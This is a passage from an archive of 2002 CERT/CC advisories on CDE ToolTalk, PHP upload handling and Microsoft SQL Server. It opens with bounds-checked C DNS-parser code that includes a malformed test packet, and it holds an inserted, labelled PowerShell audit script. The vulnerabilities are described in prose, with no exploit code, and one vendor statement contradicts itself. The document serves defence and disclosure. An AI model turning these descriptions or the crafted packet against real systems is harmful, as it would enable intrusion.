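        pos += 1 + l;
        total += 1 + l;
        if (pos > len || total > MAX_NAME) return -1;
    }
    *off = pos;
    return 0;
}

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Walk the question and answer sections and copy each A record's address
 * into out[] (at most cap entries). Returns the number of addresses stored,
 * or -1 if any length field does not fit inside the packet. */
int parse_a_records(const uint8_t *pkt, size_t len, uint8_t (*out)[4], size_t cap)
{
    if (len < 12) return -1;                       /* fixed 12-byte header */
    uint16_t qd = rd16(pkt + 4), an = rd16(pkt + 6);
    size_t off = 12, n = 0;
    for (uint16_t i = 0; i < qd; i++) {
        if (skip_name(pkt, len, &off) < 0) return -1;
        if (off + 4 > len) return -1;              /* QTYPE + QCLASS */
        off += 4;
    }
    for (uint16_t i = 0; i < an; i++) {
        if (skip_name(pkt, len, &off) < 0) return -1;
        if (off + 10 > len) return -1;             /* TYPE, CLASS, TTL, RDLENGTH */
        uint16_t type = rd16(pkt + off), rdlen = rd16(pkt + off + 8);
        off += 10;
        if (rdlen > len - off) return -1;          /* RDATA must lie inside the packet */
        if (type == 1) {                           /* A record */
            if (rdlen != 4) return -1;             /* fixed-size RDATA */
            if (n < cap) memcpy(out[n++], pkt + off, 4); /* never past the caller's cap */
        }
        off += rdlen;
    }
    return (int)n;
}

/* Constructed sample response: one question for a.example and two A records
 * that use a compression pointer (0xC00C) back to the question name. */
static const uint8_t GOOD[] = {
    0x12,0x34, 0x81,0x80, 0x00,0x01, 0x00,0x02, 0x00,0x00, 0x00,0x00,
    0x01,'a', 0x07,'e','x','a','m','p','l','e', 0x00, 0x00,0x01, 0x00,0x01,
    0xC0,0x0C, 0x00,0x01, 0x00,0x01, 0x00,0x00,0x0E,0x10, 0x00,0x04, 10,0,0,1,
    0xC0,0x0C, 0x00,0x01, 0x00,0x01, 0x00,0x00,0x0E,0x10, 0x00,0x04, 192,168,1,2,
};
/* Same packet with the first RDLENGTH inflated to 200: code that trusts the
 * field would read far past the end of this 59-byte packet; the parser rejects it. */
static const uint8_t BAD[] = {
    0x12,0x34, 0x81,0x80, 0x00,0x01, 0x00,0x02, 0x00,0x00, 0x00,0x00,
    0x01,'a', 0x07,'e','x','a','m','p','l','e', 0x00, 0x00,0x01, 0x00,0x01,
    0xC0,0x0C, 0x00,0x01, 0x00,0x01, 0x00,0x00,0x0E,0x10, 0x00,0xC8, 10,0,0,1,
    0xC0,0x0C, 0x00,0x01, 0x00,0x01, 0x00,0x00,0x0E,0x10, 0x00,0x04, 192,168,1,2,
};

int demo_good_count(void)      { uint8_t a[4][4]; return parse_a_records(GOOD, sizeof GOOD, a, 4); }
int demo_bad_count(void)       { uint8_t a[4][4]; return parse_a_records(BAD, sizeof BAD, a, 4); }
/* A packet cut off after the first record header must also be rejected. */
int demo_truncated_count(void) { uint8_t a[4][4]; return parse_a_records(GOOD, 40, a, 4); }
/* A cap of 1 must drop the second address rather than overrun the array. */
int demo_capped_count(void)    { uint8_t a[1][4]; return parse_a_records(GOOD, sizeof GOOD, a, 1); }

uint32_t demo_good_first_addr(void)
{
    uint8_t a[4][4];
    if (parse_a_records(GOOD, sizeof GOOD, a, 4) < 1) return 0;
    return ((uint32_t)a[0][0] << 24) | ((uint32_t)a[0][1] << 16) |
           ((uint32_t)a[0][2] << 8) | a[0][3];
}

int main(void)
{
    uint8_t a[4][4];
    int n = parse_a_records(GOOD, sizeof GOOD, a, 4);
    for (int i = 0; i < n; i++)
        printf("A %u.%u.%u.%u\n", (unsigned)a[i][0], (unsigned)a[i][1],
               (unsigned)a[i][2], (unsigned)a[i][3]);
    printf("inflated RDLENGTH -> %d\n", demo_bad_count());
    return 0;
}
```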
______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

June 28, 2002: Initial release

From - Wed Jul 10 19:57:05 2002
Date: Wed, 10 Jul 2002 21:36:45 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-20 Multiple Vulnerabilities in CDE ToolTalk

CERT Advisory CA-2002-20 Multiple Vulnerabilities in CDE ToolTalk

Original release date: July 10, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Systems running CDE ToolTalk

Overview

Two vulnerabilities have been discovered in the Common Desktop Environment (CDE) ToolTalk RPC database server. The first vulnerability could be used by a remote attacker to delete arbitrary files, cause a denial of service, or possibly execute arbitrary code or commands. The second vulnerability could allow a local attacker to overwrite arbitrary files with contents of the attacker's choice.

I. Description

The Common Desktop Environment (CDE) is an integrated graphical user interface that runs on UNIX and Linux operating systems. CDE ToolTalk is a message brokering system that provides an architecture for applications to communicate with each other across hosts and platforms. The ToolTalk RPC database server, rpc.ttdbserverd, manages communication between ToolTalk applications. For more information about CDE, see

http://www.opengroup.org/cde/
http://www.opengroup.org/desktop/faq/

This advisory addresses two new vulnerabilities in the CDE ToolTalk RPC database server. These vulnerabilities are summarized below and are described in further detail in their respective vulnerability notes. A list of previously documented problems in CDE can be found in Appendix B.
VU#975403 - Common Desktop Environment (CDE) ToolTalk RPC database server (rpc.ttdbserverd) does not adequately validate file descriptor argument to _TT_ISCLOSE()

The ToolTalk RPC database server does not validate the range of an argument passed to the procedure _TT_ISCLOSE(). As a result, certain locations in memory can be overwritten with zeros. For more information, please see VU#975403:

http://www.kb.cert.org/vuls/id/975403

This vulnerability has been assigned CAN-2002-0677 by the Common Vulnerabilities and Exposures (CVE) group.

VU#299816 - Common Desktop Environment (CDE) ToolTalk RPC database server (rpc.ttdbserverd) does not adequately validate file operations

The ToolTalk RPC database server does not ensure that the target of a file write operation is a valid file and not a symbolic link. For more information, please see VU#299816:

http://www.kb.cert.org/vuls/id/299816

This vulnerability has been assigned CAN-2002-0678 by the Common Vulnerabilities and Exposures (CVE) group.

II. Impact

VU#975403 - Common Desktop Environment (CDE) ToolTalk RPC database server (rpc.ttdbserverd) does not adequately validate file descriptor argument to _TT_ISCLOSE()

By issuing a specially crafted call to the procedure _TT_ISCLOSE(), a remote attacker could overwrite certain locations in memory with zeros. Using a combination of techniques that include valid ToolTalk RPC requests, an attacker could leverage this vulnerability to delete any file that is accessible by the ToolTalk RPC database server. Since the server typically runs with root privileges, any file on a vulnerable system could be deleted. Overwriting memory or deleting files could cause a denial of service. It may also be possible to execute arbitrary code and commands.
VU#299816 - Common Desktop Environment (CDE) ToolTalk RPC database server (rpc.ttdbserverd) does not adequately validate file operations

By referencing a specially crafted symbolic link in certain ToolTalk RPC requests, a local attacker could overwrite any file that is accessible by the ToolTalk RPC database server with contents of the attacker's choice. Since the server typically runs with root privileges, any file on a vulnerable system could be overwritten. Overwriting root-owned files could lead to privilege escalation or cause a denial of service.

III. Solution

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly.

Disable vulnerable service

Until patches are available and can be applied, you may wish to disable the ToolTalk RPC database service. As a best practice, the CERT/CC recommends disabling all services that are not explicitly required.

On a typical CDE system, it should be possible to disable rpc.ttdbserverd by commenting out the relevant entries in /etc/inetd.conf and, if necessary, /etc/rpc, and then by restarting the inetd process. The program number for the ToolTalk RPC database server is 100083. If references to 100083 or rpc.ttdbserverd appear in /etc/inetd.conf or /etc/rpc, or in output from the rpcinfo(1M) and ps(1) commands, then the ToolTalk RPC database server may be running. The following example was taken from a system running SunOS 5.8 (Solaris 8):

/etc/inetd.conf
...
#
# Sun ToolTalk Database Server
#
100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd
...

# rpcinfo -p
   program vers proto   port  service
...
    100083    1   tcp  32773
...

# ps -ef
     UID   PID  PPID  C    STIME TTY      TIME CMD
...
    root   355   164  0 19:31:27 ?        0:00 rpc.ttdbserverd
...

Before deciding to disable the ToolTalk RPC database server or the RPC portmapper service, carefully consider your network configuration and service requirements.

Block access to vulnerable service

Until patches are available and can be applied, you may wish to block access to the ToolTalk RPC database server and possibly the RPC portmapper service from untrusted networks such as the Internet. Use a firewall or other packet-filtering technology to block the appropriate network ports. The ToolTalk RPC database server may be configured to use port 692/tcp or another port as indicated in output from the rpcinfo(1M) command. In the example above, the ToolTalk RPC database server is configured to use port 32773/tcp. The RPC portmapper service typically runs on ports 111/tcp and 111/udp. Keep in mind that blocking ports at a network perimeter does not protect the vulnerable service from attacks that originate from the internal network.

Before deciding to block or restrict access to the ToolTalk RPC database server or the RPC portmapper service, carefully consider your network configuration and service requirements.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Caldera, Inc.

Caldera Open UNIX and Caldera UnixWare provide the CDE ttdbserverd daemon, and are vulnerable to these issues. We have prepared fixes for those two operating systems, and will make them available as soon as these issues are made public. SCO OpenServer and Caldera OpenLinux do not provide CDE, and are therefore not vulnerable.
Compaq Computer Corporation

SOURCE: Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company and Hewlett-Packard Company HP Services Software Security Response Team
CROSS REFERENCE: SSRT2251

At this time Compaq does have solutions in final testing and will publish an HP Tru64 UNIX security bulletin (SSRT2251) with patch information as soon as testing has completed and kits are available from the support ftp web site.

A recommended workaround, however, is to disable rpc.ttdbserver until solutions are available. This should only create a potential problem for public software package applications that use the RPC-based ToolTalk database server. This step should be evaluated against the risks identified, your security measures environment, and the potential impact on other products that may use the ToolTalk database server.

To disable rpc.ttdbserverd:

+ Comment out the following line in /etc/inetd.conf:

  rpc.ttdbserverd stream tcp swait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd

+ Force inetd to re-read the configuration file by executing the inetd -h command.

Note: The internet daemon should kill the currently running rpc.ttdbserver. If not, manually kill any existing rpc.ttdbserverd process.

Cray, Inc.

Cray, Inc. does include ToolTalk within the CrayTools product. However, rpc.ttdbserverd is not turned on or used by any Cray-provided application. Since a site may have turned this on for their own use, they can always remove the binary /opt/ctl/bin/rpc.ttdbserverd if they are concerned.

Fujitsu

Fujitsu's UXP/V operating system is affected by the vulnerability reported in VU#975403 [or VU#299816] because UXP/V does not support any CDE functionalities.

Hewlett-Packard Company

HP9000 Series 700/800 running HP-UX releases 10.10, 10.20, 11.00, and 11.11 are vulnerable. Until patches are available, install the appropriate file to replace rpc.ttdbserver. Download rpc.ttdbserver.tar.gz from the ftp site.
This file is temporary and will be deleted when patches are available from the standard HP web sites, including itrc.hp.com.

System: hprc.external.hp.com (192.170.19.51)
Login: ttdb1
Password: ttdb1
FTP Access: ftp://ttdb1:ttdb1@hprc.external.hp.com/
            ftp://ttdb1:ttdb1@192.170.19.51/
File: rpc.ttdbserver.tar.gz
MD5: da1be3aaf70d0e2393bd9a03feaf4b1d

An HP security bulletin will be released with more information.

IBM Corporation

The CDE desktop product shipped with AIX is vulnerable to both the issues detailed above in the advisory. This affects AIX releases 4.3.3 and 5.1.0.

An efix package will be available shortly from the IBM software ftp site. The efix packages can be downloaded from ftp.software.ibm.com/aix/efixes/security. This directory contains a README file that gives further details on the efix packages.

The following APARs will be available in the near future:

AIX 4.3.3: IY32368
AIX 5.1.0: IY32370

SGI

SGI acknowledges the ToolTalk vulnerabilities reported by CERT and is currently investigating. No further information is available at this time.

For the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported IRIX operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list on http://www.sgi.com/support/security/.

Sun Microsystems, Inc.
The Solaris RPC-based ToolTalk database server, rpc.ttdbserver, is vulnerable to the two vulnerabilities [VU#975403 VU#299816] described in this advisory in all currently supported versions of Solaris: Solaris 2.5.1, 2.6, 7, 8, and 9.

Patches are being generated for all of the above releases. Sun will publish a Sun Security Bulletin and a Sun Alert for this issue.

The Sun Alert will be available from:
http://sunsolve.sun.com

The patches will be available from:
http://sunsolve.sun.com/securitypatch

Sun Security Bulletins are available from:
http://sunsolve.sun.com/security

Xi Graphics

Xi Graphics deXtop CDE v2.1 is vulnerable to this attack. When announced, the update and accompanying text file will be:

ftp://ftp.xig.com/pub/updates/dextop/2.1/DEX2100.016.tar.gz
ftp://ftp.xig.com/pub/updates/dextop/2.1/DEX2100.016.txt

Most sites do not need to use the ToolTalk server daemon. Xi Graphics Security recommends that non-essential services are never enabled. To disable the ToolTalk server on your system, edit /etc/inetd.conf and comment out, or remove, the 'rpc.ttdbserver' line. Then, either restart inetd, or reboot your machine.

Appendix B. - References

* http://www.opengroup.org/cde/
* http://www.opengroup.org/desktop/faq/
* http://www.cert.org/advisories/CA-2002-01.html
* http://www.cert.org/advisories/CA-2001-31.html
* http://www.kb.cert.org/vuls/id/172583
* http://www.cert.org/advisories/CA-2001-27.html
* http://www.kb.cert.org/vuls/id/595507
* http://www.kb.cert.org/vuls/id/860296
* http://www.cert.org/advisories/CA-1999-11.html
* http://www.cert.org/advisories/CA-1998-11.html
* http://www.cert.org/advisories/CA-1998-02.html
_________________________________________________________________

The CERT Coordination Center thanks the reporters, Iván Arce and Ricardo Quesada of CORE SECURITY TECHNOLOGIES, for their assistance and cooperation in producing this document.
_________________________________________________________________

Author: Art Manion
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-20.html
_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

July 10, 2002: Initial release

From - Mon Jul 22 18:07:00 2002
Date: Mon, 22 Jul 2002 19:11:06 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-21 Vulnerability in PHP

CERT Advisory CA-2002-21 Vulnerability in PHP

Original release date: July 22, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Systems running PHP versions 4.2.0 or 4.2.1

Overview

A vulnerability has been discovered in PHP. This vulnerability could be used by a remote attacker to execute arbitrary code or crash PHP and/or the web server.

I. Description

PHP is a popular scripting language in widespread use. For more information about PHP, see

http://www.php.net/manual/en/faq.general.php

The vulnerability occurs in the portion of PHP code responsible for handling file uploads, specifically multipart/form-data. By sending a specially crafted POST request to the web server, an attacker can corrupt the internal data structures used by PHP. Specifically, an intruder can cause an improperly initialized memory structure to be freed. In most cases, an intruder can use this flaw to crash PHP or the web server. Under some circumstances, an intruder may be able to take advantage of this flaw to execute arbitrary code with the privileges of the web server.

You may be aware that freeing memory at inappropriate times in some implementations of malloc and free does not usually result in the execution of arbitrary code. However, because PHP utilizes its own memory management system, the implementation of malloc and free is irrelevant to this problem.

Stefan Esser of e-matters GmbH has indicated that intruders cannot execute code on x86 systems.
However, we encourage system administrators to apply patches on x86 systems as well to guard against denial-of-service attacks and as-yet-unknown attack techniques that may permit the execution of code on x86 architectures.

This vulnerability was discovered by e-matters GmbH and is described in detail in their advisory. The PHP Group has also issued an advisory. A list of vendors contacted by the CERT/CC and their status regarding this vulnerability is available in VU#929115.

Although this vulnerability only affects PHP 4.2.0 and 4.2.1, e-matters GmbH has previously identified vulnerabilities in older versions of PHP. If you are running older versions of PHP, we encourage you to review

http://security.e-matters.de/advisories/012002.html

II. Impact

A remote attacker can execute arbitrary code on a vulnerable system. An attacker may not be able to execute code on x86 architectures due to the way the stack is structured. However, an attacker can leverage this vulnerability to crash PHP and/or the web server running on an x86 architecture.

III. Solution

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly.

Upgrade to the latest version of PHP

If a patch is not available from your vendor, upgrade to version 4.2.2.

Deny POST requests

Until patches or an update can be applied, you may wish to deny POST requests. The following workaround is taken from the PHP Security Advisory:

If the PHP applications on an affected web server do not rely on HTTP POST input from user agents, it is often possible to deny POST requests on the web server.
In the Apache web server, for example, this is possible with the following code included in the main configuration file or a top-level .htaccess file:

<Limit POST>
Order deny,allow
Deny from all
</Limit>

Note that an existing configuration and/or .htaccess file may have parameters contradicting the example given above.

Disable vulnerable service

Until you can upgrade or apply patches, you may wish to disable PHP. As a best practice, the CERT/CC recommends disabling all services that are not explicitly required. Before deciding to disable PHP, carefully consider your service requirements.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Apple Computer Inc.

Mac OS X and Mac OS X Server are shipping with PHP version 4.1.2 which does not contain the vulnerability described in this alert.

Caldera

Caldera OpenLinux does not provide either vulnerable version (4.2.0, 4.2.1) of PHP in their products. Therefore, Caldera products are not vulnerable to this issue.

Compaq Computer Corporation

SOURCE: Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company and Hewlett-Packard Company HP Services Software Security Response Team
x-ref: SSRT2300 php post requests

At the time of writing this document, Compaq is currently investigating the potential impact to Compaq's released Operating System software products. As further information becomes available, Compaq will provide notice of the availability of any necessary patches through standard security bulletin announcements, and they will be available from your normal HP Services support channel.

Cray Inc.

Cray, Inc. does not supply PHP on any of its systems.

Debian

Debian GNU/Linux stable aka 3.0 is not vulnerable.
Debian GNU/Linux testing is not vulnerable.
Debian GNU/Linux unstable is vulnerable.

The problem affects PHP versions 4.2.0 and 4.2.1. Woody ships an older version of PHP (4.1.2) that doesn't contain the vulnerable function.

FreeBSD

FreeBSD does not include any version of PHP by default, and so is not vulnerable; however, the FreeBSD Ports Collection does contain the PHP4 package. Updates to the PHP4 package are in progress and a corrected package will be available in the near future.

Guardian Digital

Guardian Digital has not shipped PHP 4.2.x in any versions of EnGarde; therefore we are not believed to be vulnerable at this time.

Hewlett-Packard Company

SOURCE: Hewlett-Packard Company Security Response Team

At the time of writing this document, Hewlett Packard is currently investigating the potential impact to HP's released Operating System software products. As further information becomes available, HP will provide notice of the availability of any necessary patches through standard security bulletin announcements, and they will be available from your normal HP Services support channel.

IBM

IBM is not vulnerable to the above vulnerabilities in PHP. We do supply the PHP packages for AIX through the AIX Toolbox for Linux Applications. However, these packages are at 4.0.6 and also incorporate the security patch from 2/27/2002.

Mandrakesoft

Mandrake Linux does not ship with PHP version 4.2.x and as such is not vulnerable. The Mandrake Linux cooker does currently contain PHP 4.2.1 and will be updated shortly, but cooker should not be used in a production environment and no advisory will be issued.

Microsoft Corporation

Microsoft products are not affected by the issues detailed in this advisory.

Network Appliance

No Netapp products are vulnerable to this.

Red Hat Inc.

None of our commercial releases ship with vulnerable versions of PHP (4.2.0, 4.2.1).

SuSE Inc.

SuSE Linux is not vulnerable to this problem, as we do not ship PHP 4.2.x.
_________________________________________________________________ The CERT/CC acknowledges e-matters GmbH for discovering and reporting this vulnerability. _________________________________________________________________ Author: Ian A. Finlay. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-21.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. 
Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

July 22, 2002: Initial release

From - Mon Jul 29 18:22:23 2002
Date: Mon, 29 Jul 2002 18:10:24 -0400
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-22 Multiple Vulnerabilities in Microsoft SQL Server

CERT Advisory CA-2002-22 Multiple Vulnerabilities in Microsoft SQL Server

Original release date: July 29, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Microsoft SQL Server 7.0
* Microsoft SQL Server 2000
* Microsoft SQL Server Desktop Engine 2000

Overview

The Microsoft SQL Server contains several serious vulnerabilities that allow remote attackers to obtain sensitive information, alter database content, compromise SQL servers, and, in some configurations, compromise server hosts. These vulnerabilities are public and have been addressed by Microsoft Security Bulletins, but we believe their collective severity warrants additional attention.

I. Description

Since December 2001, Microsoft has published eight Microsoft Security Bulletins regarding more than a dozen vulnerabilities in the Microsoft SQL Server. This document provides information on the five most serious of these vulnerabilities; references to the remainder are provided in Appendix B.

In isolation, many of these vulnerabilities have significant preconditions that are difficult for an attacker to overcome. However, when exploited in combination, they allow attackers to gain additional flexibility and increase their chances for success. In particular, the privilege escalation vulnerability described in VU#796313 allows an attacker to weaken the security policy of the SQL server by granting it the same privileges as the operating system.
With full administrative privileges, a compromised Microsoft SQL Server can be used to take control of the server host. The CERT/CC encourages system administrators to take this opportunity to review the security of their Microsoft SQL servers and to apply the appropriate patches from the Microsoft bulletins listed in Appendix B.

VU#796313 - Microsoft SQL Server service account registry key has weak permissions that permit escalation of privileges (CAN-2002-0642)

The Microsoft SQL Server typically runs under a dedicated "service account" that is defined by system administrators at installation time. This definition is stored in the Windows registry with permissions that allow the SQL Server to change the value of the registry key. As a result, attackers with access to the "xp_regwrite" extended stored procedure can alter this registry key and cause the SQL Server to use the LocalSystem account as its service account. Upon rebooting the server host or restarting the SQL service, the SQL Server will run with the full administrative privileges of the LocalSystem account. This ability allows a remote attacker to submit SQL queries that can execute any command on the system with the privileges of the operating system.

VU#225555 - Microsoft SQL Server contains buffer overflow in pwdencrypt() function (CAN-2002-0624)

The Microsoft SQL Server provides multiple methods for users to authenticate to SQL databases. When SQL Server Authentication is used, the username and password of each database user is stored in a database on the SQL server. When users supply a password to the server using this method, a function named pwdencrypt() is responsible for encrypting the user-supplied password so that it can be compared to the encrypted password stored on the SQL server. There is a buffer overflow in pwdencrypt() that allows remote attackers to execute arbitrary code on the SQL server by supplying a crafted password value.
Successful exploitation of this vulnerability requires knowledge of a valid username and will cause the supplied code to execute with the privileges of the SQL service account.

VU#627275 - Microsoft SQL Server extended stored procedures contain buffer overflows (CAN-2002-0154)

Microsoft SQL Server provides a scripting construct known as an "extended stored procedure" that can execute a collection of server commands together. Several of the extended stored procedures included with the Microsoft SQL Server contain buffer overflow vulnerabilities. These procedures provide increased functionality for database applications, allowing them to access operating system or network resources. Parameters are passed to extended stored procedures via an API that specifies the actual and maximum length of various parameter data types. Some of the extended stored procedures fail to adequately validate the length of input parameters, resulting in stack buffer overflow conditions.

Since some of the vulnerable procedures are configured by default to allow public access, it is possible for an unauthenticated attacker to exploit one or more of these buffer overflows. SQL Server databases are commonly used in web applications, so the vulnerable procedures may be accessible via the Internet. Microsoft Security Bulletin MS02-020 states

     An attacker could exploit this vulnerability in one of two ways. Firstly, the attacker could attempt to load and execute a database query that calls one of the affected functions. Secondly, if a web-site or other database front-end were configured to access and process arbitrary queries, it could be possible for the attacker to provide inputs that would cause the query to call one of the functions in question with the appropriate malformed parameters.
VU#399260 - Microsoft SQL Server 2000 contains heap buffer overflow in SQL Server Resolution Service (CAN-2002-0649)

The SQL Server Resolution Service (SSRS) was introduced in Microsoft SQL Server 2000 to provide referral services for multiple server instances running on the same machine. The service listens for requests on UDP port 1434 and returns the IP address and port number of the SQL server instance that provides access to the requested database. The SSRS contains a heap buffer overflow that allows unauthenticated remote attackers to execute arbitrary code by sending a crafted request to port 1434/udp. The code within such a request will be executed by the server host with the privileges of the SQL Server service account.

VU#484891 - Microsoft SQL Server 2000 contains stack buffer overflow in SQL Server Resolution Service (CAN-2002-0649)

The SSRS also contains a stack buffer overflow that allows unauthenticated remote attackers to execute arbitrary code by sending a crafted request to port 1434/udp. The code within such a request will be executed by the server host with the privileges of the SQL Server service account.

II. Impact

VU#796313 - Microsoft SQL Server service account registry key has weak permissions that permit escalation of privileges

As a precondition, this vulnerability requires the ability to modify the SQL service account registry key (for example, via the "xp_regwrite" extended stored procedure). Attackers must convince an administrator to grant this access, or they must obtain it by exploiting one of the vulnerabilities listed in this advisory. This vulnerability allows attackers to weaken the security policy of the SQL Server by elevating its privileges and causing it to run in the LocalSystem security context. As a side effect, it increases the severity of the other vulnerabilities listed in this advisory and may enable attackers to compromise the server host as well.
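An added audit script for the two VU#796313 preconditions described above (which account the SQL service runs as, and who holds write access to its service-account registry key); it is not from the advisory or from Microsoft. It assumes the default instance's service key is HKLM\SYSTEM\CurrentControlSet\Services\MSSQLSERVER, the standard Windows location whose ObjectName value holds a service's account, and that it runs on the SQL Server host with rights to read that key's ACL.

```powershell
# Added audit script, not part of CA-2002-22 or of any Microsoft bulletin.
# Assumptions: the SQL Server instance's service key is
# HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName> (standard Windows
# location; its ObjectName value is the service account), and this runs on
# the SQL Server host with permission to read that key and its ACL.
param(
    [string]$ServiceName = 'MSSQLSERVER'
)

$keyPath  = "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName"
$findings = @()

# 1. Which account does the service run as? Running as LocalSystem is the
#    outcome the advisory warns about: full administrative privileges on the host.
$objectName = (Get-ItemProperty -Path $keyPath -Name ObjectName).ObjectName
if ($objectName -match '^(LocalSystem|NT AUTHORITY\\SYSTEM)$') {
    $findings += "Service '$ServiceName' runs as '$objectName' (LocalSystem privileges)."
}

# 2. Who may write the key? The weakness in VU#796313 is that the service
#    account itself (reachable through xp_regwrite) can change this value.
$writeRights = [System.Security.AccessControl.RegistryRights]::SetValue -bor `
               [System.Security.AccessControl.RegistryRights]::WriteKey
# Principals normally expected to hold write access on a service key.
$trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER')

$acl = Get-Acl -Path $keyPath
foreach ($ace in $acl.Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    if (($ace.RegistryRights -band $writeRights) -eq 0) { continue }
    $who = $ace.IdentityReference.Value
    if ($trusted -contains $who) { continue }
    # ObjectName may be written as DOMAIN\user or .\user, so compare only the
    # account part when deciding whether the ACE names the service account.
    $svcUser = ($objectName -split '\\')[-1]
    $aceUser = ($who -split '\\')[-1]
    $reason  = 'a non-administrative principal'
    if ($svcUser -eq $aceUser) { $reason = 'the SQL service account itself, as in VU#796313' }
    $findings += "Write access on $keyPath granted to '$who' ($($ace.RegistryRights)): $reason."
}

if ($findings.Count -eq 0) {
    Write-Output "Service account: $objectName. No write access to $keyPath outside SYSTEM/Administrators."
} else {
    foreach ($f in $findings) { Write-Warning $f }
}
```

A warning naming the service account itself is the exact condition the advisory describes; a LocalSystem warning on a host that should run under a dedicated account is worth treating as a possible sign that the key has already been changed.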
VU#225555 - Microsoft SQL Server contains buffer overflow in pwdencrypt() function

This vulnerability allows remote attackers with knowledge of a valid username to execute arbitrary code with the privileges of the SQL service account.

VU#627275 - Microsoft SQL Server extended stored procedures contain buffer overflows

This vulnerability allows unauthenticated remote attackers to execute arbitrary code with the privileges of the SQL service account.

VU#399260 - Microsoft SQL Server 2000 contains heap buffer overflow in SQL Server Resolution Service

This vulnerability allows remote attackers to execute arbitrary code with the privileges of the SQL service account.

VU#484891 - Microsoft SQL Server 2000 contains stack buffer overflow in SQL Server Resolution Service

This vulnerability allows remote attackers to execute arbitrary code with the privileges of the SQL service account.

III. Solution

Apply a patch from Microsoft

VU#796313 - Microsoft SQL Server service account registry key has weak permissions that permit escalation of privileges
VU#225555 - Microsoft SQL Server contains buffer overflow in pwdencrypt() function

Microsoft has published Security Bulletin MS02-034 to address these vulnerabilities. For more information, please see
http://www.microsoft.com/technet/security/bulletin/MS02-034.asp

VU#627275 - Microsoft SQL Server extended stored procedures contain buffer overflows

Microsoft has published Security Bulletin MS02-020 to address this vulnerability. For more information, please see
http://www.microsoft.com/technet/security/bulletin/MS02-020.asp

VU#399260 - Microsoft SQL Server 2000 contains heap buffer overflow in SQL Server Resolution Service
VU#484891 - Microsoft SQL Server 2000 contains stack buffer overflow in SQL Server Resolution Service

Microsoft has published Security Bulletin MS02-039 to address these vulnerabilities.
For more information, please see
http://www.microsoft.com/technet/security/bulletin/MS02-039.asp

Block external access to Microsoft SQL Server ports

